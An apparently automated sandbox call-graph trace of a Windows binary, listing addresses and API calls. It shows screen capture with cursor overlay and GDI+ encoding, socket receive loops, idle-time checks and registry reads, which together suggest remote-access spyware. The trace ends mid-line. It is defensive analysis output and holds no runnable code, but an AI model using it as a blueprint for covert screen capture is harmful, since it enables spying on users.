53849->53850 53850->53831 53851->53843 53852 41e04e 53853 41e063 ctype ___scrt_get_show_window_mode 53852->53853 53854 41e266 53853->53854 53871 432f55 21 API calls new 53853->53871 53860 41e21a 53854->53860 53866 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53854->53866 53857 41e277 53857->53860 53867 432f55 21 API calls new 53857->53867 53859 41e213 ___scrt_get_show_window_mode 53859->53860 53872 432f55 21 API calls new 53859->53872 53862 41e2b0 ___scrt_get_show_window_mode 53862->53860 53868 4335db 53862->53868 53864 41e240 ___scrt_get_show_window_mode 53864->53860 53873 432f55 21 API calls new 53864->53873 53866->53857 53867->53862 53874 4334fa 53868->53874 53870 4335e3 53870->53860 53871->53859 53872->53864 53873->53854 53875 433513 53874->53875 53879 433509 53874->53879 53875->53879 53880 432f55 21 API calls new 53875->53880 53877 433534 53877->53879 53881 4338c8 CryptAcquireContextA 53877->53881 53879->53870 53880->53877 53882 4338e9 CryptGenRandom 53881->53882 53884 4338e4 53881->53884 53883 4338fe CryptReleaseContext 53882->53883 53882->53884 53883->53884 53884->53879 53885 426c6d 53891 426d42 recv 53885->53891 53892 4161ee 53893 401e65 22 API calls 53892->53893 53894 4161f9 53893->53894 53936 43bb2c 53894->53936 53897 401e65 22 API calls 53898 416214 53897->53898 53899 4020f6 28 API calls 53898->53899 53900 41621e 53899->53900 53901 416265 53900->53901 53902 416236 53900->53902 53904 401e65 22 API calls 53901->53904 53903 401e65 22 API calls 53902->53903 53905 41623b 53903->53905 53906 41626a 53904->53906 53907 4020f6 28 API calls 53905->53907 53908 4020f6 28 API calls 53906->53908 53909 416246 53907->53909 53910 416275 53908->53910 53912 4020f6 28 API calls 53909->53912 53911 4020f6 28 API calls 53910->53911 53913 416284 53911->53913 53914 416255 53912->53914 53915 4187aa 147 API calls 53913->53915 53987 4187aa 53914->53987 53917 416261 53915->53917 53918 401e65 22 API calls 53917->53918 53919 41629e 53918->53919 53920 43bb2c _strftime 40 API calls 53919->53920 53921 4162ab 53920->53921 53922 401e65 22 API calls 53921->53922 53923 4162c0 53922->53923 53924 43bb2c _strftime 40 API calls 53923->53924 53925 4162cd 53924->53925 53940 418977 53925->53940 53928 4170c4 53930 401e8d 11 API calls 53928->53930 53929 401fd8 11 API calls 53929->53928 53931 4170cd 53930->53931 53932 401fd8 11 API calls 53931->53932 53933 4170d9 53932->53933 53934 401fd8 11 API calls 53933->53934 53935 4170e5 53934->53935 53937 43bb45 _strftime 53936->53937 54048 43ae83 53937->54048 53939 416206 53939->53897 53941 402093 28 API calls 53940->53941 53942 418992 53941->53942 54118 418eb1 CreateDCA CreateCompatibleDC 53942->54118 53944 4189ac 53945 4189bb 53944->53945 53946 4189da 53944->53946 53947 4020f6 28 API calls 53945->53947 53948 4020df 11 API calls 53946->53948 53949 4189cc 53947->53949 53950 4189e2 53948->53950 53951 404aa1 61 API calls 53949->53951 53952 4189e7 53950->53952 53953 418a18 53950->53953 53955 4189d5 53951->53955 54167 418c87 53952->54167 54236 418acd 53953->54236 53961 401fd8 11 API calls 53955->53961 53960 401fe2 28 API calls 53964 418a31 53960->53964 53962 418aba 53961->53962 53965 401fd8 11 API calls 53962->53965 53967 401fd8 11 API calls 53964->53967 53968 4162d6 53965->53968 53966 401fd8 11 API calls 53969 418a16 53966->53969 53967->53969 53968->53928 53968->53929 54249 41be87 28 API calls 53969->54249 53971 418a62 54250 406362 28 API calls 53971->54250 53973 418a6e 53974 402f10 28 API calls 53973->53974 53975 418a79 53974->53975 53976 402f10 28 API calls 53975->53976 53977 418a83 53976->53977 53978 404aa1 61 API calls 53977->53978 53979 418a8d 53978->53979 53980 401fd8 11 API calls 53979->53980 53981 418a97 53980->53981 53982 401fd8 11 API calls 53981->53982 53983 418a9f 53982->53983 53984 401fd8 11 API calls 53983->53984 53985 418aaa 53984->53985 53986 401fd8 11 API calls 53985->53986 53986->53955 54290 401fc0 53987->54290 53990 401fc0 28 API calls 53991 4187db 53990->53991 53992 418800 ___scrt_get_show_window_mode 53991->53992 53993 4187f1 GdiplusStartup 53991->53993 54294 4194ff 53992->54294 53993->53992 53998 401f09 11 API calls 53999 41883e 53998->53999 54000 41884b 53999->54000 54001 404e26 99 API calls 53999->54001 54314 418e83 DeleteDC 54000->54314 54001->54000 54003 418850 54004 40482d 3 API calls 54003->54004 54005 418857 54004->54005 54006 41885b 54005->54006 54007 4048c8 97 API calls 54005->54007 54008 404e26 99 API calls 54006->54008 54009 418867 54007->54009 54010 418872 54008->54010 54009->54006 54011 418877 54009->54011 54014 401fd8 11 API calls 54010->54014 54315 404be5 CreateThread 54011->54315 54013 418881 54017 418899 54013->54017 54018 41891c 54013->54018 54015 41895f 54014->54015 54016 401fd8 11 API calls 54015->54016 54019 41896b 54016->54019 54316 41bd4f 28 API calls 54017->54316 54021 402f31 28 API calls 54018->54021 54019->53917 54022 418934 54021->54022 54024 402f10 28 API calls 54022->54024 54023 4188a0 54317 41bc1f 54023->54317 54026 41893e 54024->54026 54028 404aa1 61 API calls 54026->54028 54047 41891a 54028->54047 54029 402f31 28 API calls 54030 4188c8 54029->54030 54031 402ea1 28 API calls 54030->54031 54033 4188d4 54031->54033 54032 401fd8 11 API calls 54032->54010 54034 402f10 28 API calls 54033->54034 54035 4188e0 54034->54035 54036 402ea1 28 API calls 54035->54036 54037 4188ea 54036->54037 54038 404aa1 61 API calls 54037->54038 54039 4188f4 54038->54039 54040 401fd8 11 API calls 54039->54040 54041 4188ff 54040->54041 54042 401fd8 11 API calls 54041->54042 54043 418908 54042->54043 54044 401fd8 11 API calls 54043->54044 54045 418911 54044->54045 54046 401fd8 11 API calls 54045->54046 54046->54047 54047->54032 54064 43ba8a 54048->54064 54050 43aed0 54070 43a837 54050->54070 54051 43ae95 54051->54050 54052 43aeaa 54051->54052 54063 43aeaf pre_c_initialization 54051->54063 54069 44062d 20 API calls _abort 54052->54069 54056 43aedc 54057 43af0b 54056->54057 54078 43bacf 40 API calls __Tolower 54056->54078 54058 43af77 54057->54058 54079 43ba36 20 API calls 2 library calls 54057->54079 54080 43ba36 20 API calls 2 library calls 54058->54080 54061 43b03e _strftime 54061->54063 54081 44062d 20 API calls _abort 54061->54081 54063->53939 54065 43baa2 54064->54065 54066 43ba8f 54064->54066 54065->54051 54082 44062d 20 API calls _abort 54066->54082 54068 43ba94 pre_c_initialization 54068->54051 54069->54063 54071 43a854 54070->54071 54072 43a84a 54070->54072 54071->54072 54083 448295 GetLastError 54071->54083 54072->54056 54074 43a875 54104 4483e4 36 API calls __Getctype 54074->54104 54076 43a88e 54105 448411 36 API calls __cftof 54076->54105 54078->54056 54079->54058 54080->54061 54081->54063 54082->54068 54084 4482b7 54083->54084 54085 4482ab 54083->54085 54107 445b74 20 API calls 3 library calls 54084->54107 54106 44883c 11 API calls 2 library calls 54085->54106 54088 4482b1 54088->54084 54090 448300 SetLastError 54088->54090 54089 4482c3 54091 4482cb 54089->54091 54114 448892 11 API calls 2 library calls 54089->54114 54090->54074 54108 446802 54091->54108 54093 4482e0 54093->54091 54096 4482e7 54093->54096 54095 4482d1 54097 44830c SetLastError 54095->54097 54115 448107 20 API calls _abort 54096->54115 54116 446175 36 API calls 4 library calls 54097->54116 54099 4482f2 54101 446802 _free 20 API calls 54099->54101 54103 4482f9 54101->54103 54102 448318 54103->54090 54103->54097 54104->54076 54105->54072 54106->54088 54107->54089 54109 44680d HeapFree 54108->54109 54110 446836 __dosmaperr 54108->54110 54109->54110 54111 446822 54109->54111 54110->54095 54117 44062d 20 API calls _abort 54111->54117 54113 446828 GetLastError 54113->54110 54114->54093 54115->54099 54116->54102 54117->54113 54251 419360 54118->54251 54120 418eec 54121 418f13 54120->54121 54256 4193a2 GetMonitorInfoW 54120->54256 54123 418f71 54121->54123 54254 4193d8 GetMonitorInfoW 54121->54254 54124 402093 28 API calls 54123->54124 54166 418f7d 54124->54166 54127 418f8a SelectObject 54130 418fa5 StretchBlt 54127->54130 54131 418f96 DeleteDC DeleteDC 54127->54131 54128 418f5e DeleteDC DeleteDC 54129 418f6b DeleteObject 54128->54129 54129->54123 54130->54131 54132 418fce 54130->54132 54131->54129 54134 418fd5 GetCursorInfo 54132->54134 54135 41904f 54132->54135 54134->54135 54136 418fec GetIconInfo 54134->54136 54137 419099 GetObjectA 54135->54137 54139 419062 BitBlt 54135->54139 54140 419089 54135->54140 54136->54135 54138 419002 DeleteObject DeleteObject DrawIcon 54136->54138 54137->54131 54142 4190b1 LocalAlloc 54137->54142 54138->54135 54139->54137 54140->54137 54143 419154 GlobalAlloc 54142->54143 54144 41914a 54142->54144 54143->54131 54145 419196 GetDIBits 54143->54145 54144->54143 54146 4191d3 54145->54146 54147 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54145->54147 54148 4020df 11 API calls 54146->54148 54147->54123 54149 41920f 54148->54149 54150 4020df 11 API calls 54149->54150 54151 41921b 54150->54151 54152 40250a 28 API calls 54151->54152 54153 41922b 54152->54153 54154 40250a 28 API calls 54153->54154 54155 419248 54154->54155 54156 40250a 28 API calls 54155->54156 54157 41926a 54156->54157 54158 41927b DeleteObject GlobalFree DeleteDC 54157->54158 54159 4192a0 54158->54159 54160 41929d DeleteDC 54158->54160 54161 402055 11 API calls 54159->54161 54160->54159 54162 4192af 54161->54162 54163 401fd8 11 API calls 54162->54163 54164 4192bb 54163->54164 54165 401fd8 11 API calls 54164->54165 54165->54166 54166->53944 54257 418bca 54167->54257 54169 418c9c 54170 418cb9 54169->54170 54171 418cae 54169->54171 54173 418da5 54170->54173 54174 418cc4 54170->54174 54270 418e83 DeleteDC 54171->54270 54176 418d32 54173->54176 54273 418e83 DeleteDC 54173->54273 54174->54176 54177 418ce1 54174->54177 54178 418d4b 54174->54178 54175 418cb3 54182 418eb1 59 API calls 54175->54182 54179 402055 11 API calls 54176->54179 54271 418e83 DeleteDC 54177->54271 54272 418e83 DeleteDC 54178->54272 54184 418e6d 54179->54184 54188 418cfa 54182->54188 54185 401fd8 11 API calls 54184->54185 54189 418a05 54185->54189 54186 418d50 54190 418eb1 59 API calls 54186->54190 54187 418dc4 54191 418eb1 59 API calls 54187->54191 54192 401fe2 28 API calls 54188->54192 54227 401fe2 54189->54227 54193 418d64 54190->54193 54194 418dd8 54191->54194 54195 418d05 54192->54195 54196 401fe2 28 API calls 54193->54196 54197 401fe2 28 API calls 54194->54197 54198 401fd8 11 API calls 54195->54198 54199 418d6f 54196->54199 54200 418de3 54197->54200 54201 418d0e 54198->54201 54202 401fd8 11 API calls 54199->54202 54203 401fd8 11 API calls 54200->54203 54204 418acd 35 API calls 54201->54204 54205 418d78 54202->54205 54206 418dec 54203->54206 54207 418d1e 54204->54207 54208 418bca 35 API calls 54205->54208 54209 418bca 35 API calls 54206->54209 54210 401fe2 28 API calls 54207->54210 54211 418d83 54208->54211 54212 418df7 54209->54212 54213 418d29 54210->54213 54214 401fe2 28 API calls 54211->54214 54215 401fe2 28 API calls 54212->54215 54216 401fd8 11 API calls 54213->54216 54217 418d8d 54214->54217 54218 418e01 54215->54218 54216->54176 54219 401fd8 11 API calls 54217->54219 54220 401fd8 11 API calls 54218->54220 54219->54176 54221 418e0a 54220->54221 54221->54176 54222 418acd 35 API calls 54221->54222 54223 418e27 54222->54223 54224 401fe2 28 API calls 54223->54224 54225 418e32 54224->54225 54226 401fd8 11 API calls 54225->54226 54226->54176 54228 401ff1 54227->54228 54229 402039 54227->54229 54230 4023ce 11 API calls 54228->54230 54229->53966 54231 401ffa 54230->54231 54232 40203c 54231->54232 54233 402015 54231->54233 54234 40267a 11 API calls 54232->54234 54287 403098 28 API calls 54233->54287 54234->54229 54237 418af0 54236->54237 54238 418af8 SHCreateMemStream 54237->54238 54288 418691 GdipLoadImageFromStream 54238->54288 54240 418b0c 54241 4192c9 23 API calls 54240->54241 54242 418b1a SHCreateMemStream 54241->54242 54243 418706 GdipSaveImageToStream 54242->54243 54244 418b62 54243->54244 54245 40520c 28 API calls 54244->54245 54246 418b7b 54245->54246 54289 4186b4 GdipDisposeImage 54246->54289 54248 418a27 54248->53960 54249->53971 54250->53973 54252 436f10 ___scrt_get_show_window_mode 54251->54252 54253 41937e EnumDisplaySettingsW 54252->54253 54253->54120 54255 418f48 CreateCompatibleBitmap 54254->54255 54255->54127 54255->54128 54256->54121 54258 418bdc 54257->54258 54259 418be4 SHCreateMemStream 54258->54259 54274 418691 GdipLoadImageFromStream 54259->54274 54261 418bf8 54275 4192c9 54261->54275 54263 418c06 SHCreateMemStream 54282 418706 GdipSaveImageToStream 54263->54282 54265 418c22 54266 40520c 28 API calls 54265->54266 54267 418c3b 54266->54267 54284 4186b4 GdipDisposeImage 54267->54284 54269 418c7d 54269->54169 54270->54175 54271->54175 54272->54186 54273->54187 54274->54261 54285 41874f GdipGetImageEncodersSize 54275->54285 54277 4192eb 54278 43bda0 new 21 API calls 54277->54278 54281 4192f1 54277->54281 54279 419300 54278->54279 54279->54281 54286 418758 GdipGetImageEncoders 54279->54286 54281->54263 54283 418726 54282->54283 54283->54265 54284->54269 54285->54277 54286->54281 54287->54229 54288->54240 54289->54248 54291 401fd2 54290->54291 54292 401fc9 54290->54292 54291->53990 54322 4025e0 28 API calls 54292->54322 54323 401f86 54294->54323 54297 4195f1 EnumDisplayDevicesW 54298 418828 54297->54298 54299 419542 EnumDisplayDevicesW 54297->54299 54305 401f13 54298->54305 54300 41956a 54299->54300 54300->54297 54301 40417e 28 API calls 54300->54301 54303 401f09 11 API calls 54300->54303 54304 4195be EnumDisplayDevicesW 54300->54304 54327 403014 54300->54327 54301->54300 54303->54300 54304->54300 54306 401f22 54305->54306 54313 401f6a 54305->54313 54307 402252 11 API calls 54306->54307 54308 401f2b 54307->54308 54309 401f6d 54308->54309 54311 401f46 54308->54311 54310 402336 11 API calls 54309->54310 54310->54313 54368 40305c 28 API calls 54311->54368 54313->53998 54314->54003 54315->54013 54369 404c01 54315->54369 54316->54023 54574 441ed1 54317->54574 54320 402093 28 API calls 54321 4188bb 54320->54321 54321->54029 54322->54291 54324 401f8e 54323->54324 54325 402252 11 API calls 54324->54325 54326 401f99 EnumDisplayMonitors 54325->54326 54326->54297 54332 403222 54327->54332 54329 403022 54336 403262 54329->54336 54333 40322e 54332->54333 54342 403618 54333->54342 54335 40323b 54335->54329 54337 40326e 54336->54337 54338 402252 11 API calls 54337->54338 54339 403288 54338->54339 54364 402336 54339->54364 54343 403626 54342->54343 54344 403644 54343->54344 54345 40362c 54343->54345 54347 40365c 54344->54347 54348 40369e 54344->54348 54353 4036a6 54345->54353 54351 4027e6 28 API calls 54347->54351 54352 403642 54347->54352 54362 4028a4 22 API calls 54348->54362 54351->54352 54352->54335 54354 402888 22 API calls 54353->54354 54355 4036b9 54354->54355 54356 40372c 54355->54356 54357 4036de 54355->54357 54363 4028a4 22 API calls 54356->54363 54360 4027e6 28 API calls 54357->54360 54361 4036f0 54357->54361 54360->54361 54361->54352 54365 402347 54364->54365 54366 402252 11 API calls 54365->54366 54367 4023c7 54366->54367 54367->54300 54368->54313 54372 404c10 54369->54372 54373 4020df 11 API calls 54372->54373 54374 404c27 54373->54374 54375 4020df 11 API calls 54374->54375 54381 404c30 54375->54381 54376 43bda0 new 21 API calls 54376->54381 54378 4020b7 28 API calls 54378->54381 54379 404ca1 54382 404e26 99 API calls 54379->54382 54380 401fe2 28 API calls 54380->54381 54381->54376 54381->54378 54381->54379 54381->54380 54383 401fd8 11 API calls 54381->54383 54390 404b96 54381->54390 54396 404cc3 54381->54396 54384 404ca8 54382->54384 54383->54381 54385 401fd8 11 API calls 54384->54385 54386 404cb1 54385->54386 54387 401fd8 11 API calls 54386->54387 54388 404c0f 54387->54388 54391 404ba0 WaitForSingleObject 54390->54391 54392 404bcd recv 54390->54392 54408 421107 54 API calls 54391->54408 54393 404be0 54392->54393 54393->54381 54395 404bbc SetEvent 54395->54393 54397 4020df 11 API calls 54396->54397 54407 404cde 54397->54407 54398 404e13 54399 401fd8 11 API calls 54398->54399 54400 404e1c 54399->54400 54400->54381 54401 4041a2 28 API calls 54401->54407 54402 401fe2 28 API calls 54402->54407 54403 401fd8 11 API calls 54403->54407 54404 4020f6 28 API calls 54404->54407 54405 401fc0 28 API calls 54406 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 54405->54406 54406->54407 54409 415b25 54406->54409 54407->54398 54407->54401 54407->54402 54407->54403 54407->54404 54407->54405 54408->54395 54410 4020f6 28 API calls 54409->54410 54411 415b47 SetEvent 54410->54411 54412 415b5c 54411->54412 54488 4041a2 54412->54488 54415 4020f6 28 API calls 54416 415b86 54415->54416 54417 4020f6 28 API calls 54416->54417 54418 415b98 54417->54418 54491 41beac 54418->54491 54421 415bc1 GetTickCount 54424 41bc1f 28 API calls 54421->54424 54422 415d20 54485 415d11 54422->54485 54486 415d34 54422->54486 54423 401e8d 11 API calls 54425 4170cd 54423->54425 54426 415bd2 54424->54426 54428 401fd8 11 API calls 54425->54428 54513 41bb77 GetLastInputInfo GetTickCount 54426->54513 54430 4170d9 54428->54430 54432 401fd8 11 API calls 54430->54432 54431 415bde 54434 41bc1f 28 API calls 54431->54434 54433 4170e5 54432->54433 54435 415be9 54434->54435 54436 41bb27 30 API calls 54435->54436 54437 415bf7 54436->54437 54438 41bdaf 28 API calls 54437->54438 54439 415c05 54438->54439 54440 401e65 22 API calls 54439->54440 54441 415c13 54440->54441 54442 402f31 28 API calls 54441->54442 54443 415c21 54442->54443 54444 402ea1 28 API calls 54443->54444 54445 415c30 54444->54445 54446 402f10 28 API calls 54445->54446 54447 415c3f 54446->54447 54448 402ea1 28 API calls 54447->54448 54449 415c4e 54448->54449 54450 402f10 28 API calls 54449->54450 54451 415c5a 54450->54451 54452 402ea1 28 API calls 54451->54452 54453 415c64 54452->54453 54454 404aa1 61 API calls 54453->54454 54455 415c73 54454->54455 54456 401fd8 11 API calls 54455->54456 54457 415c7c 54456->54457 54458 401fd8 11 API calls 54457->54458 54459 415c88 54458->54459 54460 401fd8 11 API calls 54459->54460 54461 415c94 54460->54461 54462 401fd8 11 API calls 54461->54462 54463 415ca0 54462->54463 54464 401fd8 11 API calls 54463->54464 54465 415cac 54464->54465 54466 401fd8 11 API calls 54465->54466 54467 415cb8 54466->54467 54468 401f09 11 API calls 54467->54468 54469 415cc1 54468->54469 54470 401fd8 11 API calls 54469->54470 54471 415cca 54470->54471 54472 401fd8 11 API calls 54471->54472 54473 415cd3 54472->54473 54474 401e65 22 API calls 54473->54474 54475 415cde 54474->54475 54476 43bb2c _strftime 40 API calls 54475->54476 54477 415ceb 54476->54477 54478 415cf0 54477->54478 54479 415d16 54477->54479 54481 415d09 54478->54481 54482 415cfe 54478->54482 54480 401e65 22 API calls 54479->54480 54480->54422 54515 404f51 54481->54515 54514 404ff4 82 API calls 54482->54514 54485->54423 54530 4050e4 84 API calls 54486->54530 54487 415d04 54487->54485 54531 40423a 54488->54531 54492 4020df 11 API calls 54491->54492 54512 41bebf 54492->54512 54493 41bf2f 54494 401fd8 11 API calls 54493->54494 54495 41bf61 54494->54495 54496 401fd8 11 API calls 54495->54496 54499 41bf69 54496->54499 54497 41bf31 54500 4041a2 28 API calls 54497->54500 54498 4041a2 28 API calls 54498->54512 54501 401fd8 11 API calls 54499->54501 54502 41bf3d 54500->54502 54505 415ba1 54501->54505 54503 401fe2 28 API calls 54502->54503 54506 41bf46 54503->54506 54504 401fe2 28 API calls 54504->54512 54505->54421 54505->54422 54505->54485 54507 401fd8 11 API calls 54506->54507 54509 41bf4e 54507->54509 54508 401fd8 11 API calls 54508->54512 54510 41cec5 28 API calls 54509->54510 54510->54493 54512->54493 54512->54497 54512->54498 54512->54504 54512->54508 54537 41cec5 54512->54537 54513->54431 54514->54487 54516 404f65 54515->54516 54517 404fea 54515->54517 54518 404f6e 54516->54518 54519 404fc0 CreateEventA CreateThread 54516->54519 54520 404f7d GetLocalTime 54516->54520 54517->54485 54518->54519 54519->54517 54570 405150 54519->54570 54521 41bc1f 28 API calls 54520->54521 54522 404f91 54521->54522 54569 4052fd 28 API calls 54522->54569 54530->54487 54532 404243 54531->54532 54533 4023ce 11 API calls 54532->54533 54534 40424e 54533->54534 54535 402569 28 API calls 54534->54535 54536 4041b5 54535->54536 54536->54415 54538 41ced2 54537->54538 54539 41cf31 54538->54539 54543 41cee2 54538->54543 54540 41cf4b 54539->54540 54541 41d071 28 API calls 54539->54541 54557 41d1d7 28 API calls 54540->54557 54541->54540 54545 41cf1a 54543->54545 54548 41d071 54543->54548 54556 41d1d7 28 API calls 54545->54556 54547 41cf2d 54547->54512 54550 41d079 54548->54550 54549 41d0ab 54549->54545 54550->54549 54551 41d0af 54550->54551 54554 41d093 54550->54554 54568 402725 22 API calls 54551->54568 54558 41d0e2 54554->54558 54556->54547 54557->54547 54559 41d0ec __EH_prolog 54558->54559 54560 402717 22 API calls 54559->54560 54561 41d0ff 54560->54561 54562 41d1ee 11 API calls 54561->54562 54563 41d125 54562->54563 54564 41d15d 54563->54564 54565 402730 11 API calls 54563->54565 54564->54549 54566 41d144 54565->54566 54567 402712 11 API calls 54566->54567 54567->54564 54573 40515c 102 API calls 54570->54573 54572 405159 54573->54572 54575 441edd 54574->54575 54578 441ccd 54575->54578 54577 41bc43 54577->54320 54579 441ce4 54578->54579 54581 441d1b pre_c_initialization 54579->54581 54582 44062d 20 API calls _abort 54579->54582 54581->54577 54582->54581 54583 426a77 54584 426a8c 54583->54584 54591 426b1e 54583->54591 54585 426bae 54584->54585 54588 426b0e 54584->54588 54589 426b83 54584->54589 54584->54591 54594 426b4e 54584->54594 54596 426ad9 54584->54596 54597 426bd5 54584->54597 54611 424f6e 49 API calls ctype 54584->54611 54585->54591 54585->54597 54599 425b72 54585->54599 54588->54591 54588->54594 54613 424f6e 49 API calls ctype 54588->54613 54589->54585 54615 425781 21 API calls 54589->54615 54594->54589 54594->54591 54614 41fbfd 52 API calls 54594->54614 54596->54588 54596->54591 54612 41fbfd 52 API calls 54596->54612 54597->54591 54616 4261e6 28 API calls 54597->54616 54600 425b91 ___scrt_get_show_window_mode 54599->54600 54602 425ba0 54600->54602 54606 425bc5 54600->54606 54617 41ec4c 21 API calls 54600->54617 54602->54606 54610 425ba5 54602->54610 54618 420669 46 API calls 54602->54618 54605 425bae 54605->54606 54621 424d96 21 API calls 2 library calls 54605->54621 54606->54597 54608 425c48 54608->54606 54619 432f55 21 API calls new 54608->54619 54610->54605 54610->54606 54620 41daf0 49 API calls 54610->54620 54611->54596 54612->54596 54613->54594 54614->54594 54615->54585 54616->54591 54617->54602 54618->54608 54619->54610 54620->54605 54621->54606 54622 4165db 54623 401e65 22 API calls 54622->54623 54624 4165eb 54623->54624 54625 4020f6 28 API calls 54624->54625 54626 4165f6 54625->54626 54627 401e65 22 API calls 54626->54627 54628 416601 54627->54628 54629 4020f6 28 API calls 54628->54629 54630 41660c 54629->54630 54633 412965 54630->54633 54634 40482d 3 API calls 54633->54634 54635 412979 54634->54635 54636 4048c8 97 API calls 54635->54636 54637 412981 54636->54637 54638 402f31 28 API calls 54637->54638 54639 41299a 54638->54639 54640 402f10 28 API calls 54639->54640 54641 4129a4 54640->54641 54642 404aa1 61 API calls 54641->54642 54643 4129ae 54642->54643 54644 401fd8 11 API calls 54643->54644 54645 4129b6 54644->54645 54646 404c10 130 API calls 54645->54646 54647 4129c4 54646->54647 54648 401fd8 11 API calls 54647->54648 54649 4129cc 54648->54649 54650 401fd8 11 API calls 54649->54650 54651 4129d4 54650->54651 54652 44839e 54660 448790 54652->54660 54655 4483b2 54657 4483ba 54658 4483c7 54657->54658 54668 4483ca 11 API calls 54657->54668 54661 44854a _abort 5 API calls 54660->54661 54662 4487b7 54661->54662 54663 4487cf TlsAlloc 54662->54663 54664 4487c0 54662->54664 54663->54664 54665 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54664->54665 54666 4483a8 54665->54666 54666->54655 54667 448319 20 API calls 3 library calls 54666->54667 54667->54657 54668->54655 54669 100020db 54671 100020e7 ___DestructExceptionObject 54669->54671 54670 10002110 dllmain_raw 54672 100020f6 54670->54672 54673 1000212a 54670->54673 54671->54670 54671->54672 54677 1000210b 54671->54677 54682 10001eec 54673->54682 54675 10002177 54675->54672 54676 10001eec 29 API calls 54675->54676 54678 1000218a 54676->54678 54677->54672 54677->54675 54679 10001eec 29 API calls 54677->54679 54678->54672 54680 10002193 dllmain_raw 54678->54680 54681 1000216d dllmain_raw 54679->54681 54680->54672 54681->54675 54683 10001ef7 54682->54683 54684 10001f2a dllmain_crt_process_detach 54682->54684 54685 10001f1c dllmain_crt_process_attach 54683->54685 54686 10001efc 54683->54686 54691 10001f06 54684->54691 54685->54691 54687 10001f01 54686->54687 54688 10001f12 54686->54688 54687->54691 54692 1000240b 25 API calls 54687->54692 54693 100023ec 27 API calls 54688->54693 54691->54677 54692->54691 54693->54691 54694 434918 54695 434924 ___scrt_is_nonwritable_in_current_image 54694->54695 54721 434627 54695->54721 54697 43492b 54699 434954 54697->54699 55027 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54697->55027 54707 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54699->54707 54732 4442d2 54699->54732 54703 434973 ___scrt_is_nonwritable_in_current_image 54704 4349f3 54740 434ba5 54704->54740 54707->54704 55028 443487 36 API calls 3 library calls 54707->55028 54722 434630 54721->54722 55033 434cb6 IsProcessorFeaturePresent 54722->55033 54724 43463c 55034 438fb1 54724->55034 54726 434641 54727 434645 54726->54727 55043 44415f 54726->55043 54727->54697 54730 43465c 54730->54697 54734 4442e9 54732->54734 54733 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54735 43496d 54733->54735 54734->54733 54735->54703 54736 444276 54735->54736 54737 4442a5 54736->54737 54738 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54737->54738 54739 4442ce 54738->54739 54739->54707 54741 436f10 ___scrt_get_show_window_mode 54740->54741 54742 434bb8 GetStartupInfoW 54741->54742 54743 4349f9 54742->54743 54744 444223 54743->54744 55093 44f0d9 54744->55093 54746 44422c 54748 434a02 54746->54748 55097 446895 36 API calls 54746->55097 54749 40ea00 54748->54749 55227 41cbe1 LoadLibraryA GetProcAddress 54749->55227 54751 40ea1c GetModuleFileNameW 55232 40f3fe 54751->55232 54753 40ea38 54754 4020f6 28 API calls 54753->54754 54755 40ea47 54754->54755 54756 4020f6 28 API calls 54755->54756 54757 40ea56 54756->54757 54758 41beac 28 API calls 54757->54758 54759 40ea5f 54758->54759 55247 40fb52 54759->55247 54761 40ea68 54762 401e8d 11 API calls 54761->54762 54763 40ea71 54762->54763 54764 40ea84 54763->54764 54765 40eace 54763->54765 55432 40fbee 118 API calls 54764->55432 54767 401e65 22 API calls 54765->54767 54769 40eade 54767->54769 54768 40ea96 54770 401e65 22 API calls 54768->54770 54772 401e65 22 API calls 54769->54772 54771 40eaa2 54770->54771 55433 410f72 36 API calls __EH_prolog 54771->55433 54773 40eafd 54772->54773 54774 40531e 28 API calls 54773->54774 54776 40eb0c 54774->54776 54778 406383 28 API calls 54776->54778 54777 40eab4 55434 40fb9f 78 API calls 54777->55434 54780 40eb18 54778->54780 54782 401fe2 28 API calls 54780->54782 54781 40eabd 55435 40f3eb 71 API calls 54781->55435 54784 40eb24 54782->54784 54785 401fd8 11 API calls 54784->54785 54786 40eb2d 54785->54786 54788 401fd8 11 API calls 54786->54788 54790 40eb36 54788->54790 54791 401e65 22 API calls 54790->54791 54792 40eb3f 54791->54792 54793 401fc0 28 API calls 54792->54793 54794 40eb4a 54793->54794 54795 401e65 22 API calls 54794->54795 54796 40eb63 54795->54796 54797 401e65 22 API calls 54796->54797 54798 40eb7e 54797->54798 54799 40ebe9 54798->54799 55436 406c59 54798->55436 54800 401e65 22 API calls 54799->54800 54806 40ebf6 54800->54806 54802 40ebab 54803 401fe2 28 API calls 54802->54803 54804 40ebb7 54803->54804 54805 401fd8 11 API calls 54804->54805 54808 40ebc0 54805->54808 54807 40ec3d 54806->54807 54812 413584 3 API calls 54806->54812 55251 40d0a4 54807->55251 55441 413584 RegOpenKeyExA 54808->55441 54818 40ec21 54812->54818 54816 40f38a 55534 4139e4 30 API calls 54816->55534 54818->54807 55444 4139e4 30 API calls 54818->55444 54826 40f3a0 55535 4124b0 65 API calls ___scrt_get_show_window_mode 54826->55535 55027->54697 55028->54704 55033->54724 55035 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 55034->55035 55047 43a4ba 55035->55047 55038 438fc4 55038->54726 55040 438fcc 55041 438fd7 55040->55041 55061 43a4f6 DeleteCriticalSection 55040->55061 55041->54726 55089 44fbe8 55043->55089 55046 438fda 8 API calls 3 library calls 55046->54727 55048 43a4c3 55047->55048 55050 43a4ec 55048->55050 55051 438fc0 55048->55051 55062 438eff 55048->55062 55067 43a4f6 DeleteCriticalSection 55050->55067 55051->55038 55053 43a46c 55051->55053 55082 438e14 55053->55082 55055 43a476 55056 43a481 55055->55056 55087 438ec2 6 API calls try_get_function 55055->55087 55056->55040 55058 43a48f 55059 43a49c 55058->55059 55088 43a49f 6 API calls ___vcrt_FlsFree 55058->55088 55059->55040 55061->55038 55068 438cf3 55062->55068 55065 438f36 InitializeCriticalSectionAndSpinCount 55066 438f22 55065->55066 55066->55048 55067->55051 55069 438d23 55068->55069 55070 438d27 55068->55070 55069->55070 55071 438d47 55069->55071 55075 438d93 55069->55075 55070->55065 55070->55066 55071->55070 55073 438d53 GetProcAddress 55071->55073 55074 438d63 __crt_fast_encode_pointer 